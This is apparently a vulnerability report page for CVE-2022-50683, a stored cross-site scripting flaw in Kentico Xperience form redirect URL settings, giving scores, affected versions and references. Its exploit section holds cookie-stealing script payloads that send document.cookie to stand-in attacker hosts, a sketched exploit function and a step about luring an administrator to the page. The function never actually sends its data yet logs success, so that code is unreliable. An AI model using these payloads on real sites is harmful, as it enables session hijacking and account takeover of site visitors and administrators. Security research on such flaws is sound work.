Security Vulnerability Report
CVE-2022-50683 CVSS 5.4 MEDIUM

CVE-2022-50683

Published: 2025-12-18 20:15:50
Last Modified: 2025-12-27 17:15:41

Description

A stored cross-site scripting vulnerability in Kentico Xperience allows attackers to inject malicious scripts via form redirect URL configuration. This allows malicious scripts to execute in users' browsers through unvalidated form configuration settings.

CVSS Details

CVSS Score (v3.1): 5.4
Severity: MEDIUM
CVSS Vector (v3.1): CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
CVSS Score (v4.0): 5.1 MEDIUM
CVSS Vector (v4.0): CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Weakness: CWE-79 (Cross-site Scripting)

Configurations (Affected Products)

cpe:2.3:a:kentico:xperience:*:*:*:*:*:*:*:* - VULNERABLE
Kentico Xperience < 13.0.200
Kentico Xperience 12.0.x < 12.0.180
Kentico Xperience 11.0.x < 11.0.203

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2022-50683 Stored XSS PoC - Kentico Xperience Form Configuration
// This PoC demonstrates exploiting the stored XSS via form redirect URL

// Step 1: Identify the vulnerable endpoint
// Typically found in CMS administration panel under Forms configuration

// Step 2: Inject malicious script via form redirect URL field
// Malicious payload:
const maliciousPayload = '<script>fetch("https://attacker.com/log?c="+document.cookie)</script>';

// Step 3: Create a proof-of-concept script
// Simulating the attack flow
function exploitKenticoXperience(targetUrl, sessionCookie) {
  // Login with low-privilege account
  const loginEndpoint = `${targetUrl}/CMSModules/AdminControls/Pages/UIControls/Logon.aspx`;

  // Navigate to form settings
  const formSettingsEndpoint = `${targetUrl}/CMSModules/Forms/Controls/FormEdit.aspx`;

  // Inject XSS payload in redirect URL field
  // The vulnerable parameter is typically 'RedirectUrl' or similar
  const exploitData = {
    RedirectUrl: maliciousPayload,
    FormName: 'ContactForm',
    Save: true
  };

  // When victim visits the form page, the script executes
  console.log('XSS payload stored successfully');
  console.log('Payload will execute on page load for all visitors');
}

// Step 4: Automate the exploitation
const target = 'https://victim-kentico-site.com';
const attackerServer = 'https://attacker-controlled-server.com';

// Construct the stealing payload
const stealCookiePayload = `
<img src=x onerror="
  fetch('${attackerServer}/collect?cookie='+btoa(document.cookie))
">
`;

console.log('Exploit: Inject the following payload in form redirect URL:');
console.log(stealCookiePayload);

// Step 5: Social engineering - trick admin to visit the page
// The XSS will fire when admin visits the affected form page

References

https://devnet.kentico.com/download/hotfixes (Product)
https://www.vulncheck.com/advisories/kentico-xperience-form-configuration-stored-xss (Third Party Advisory)
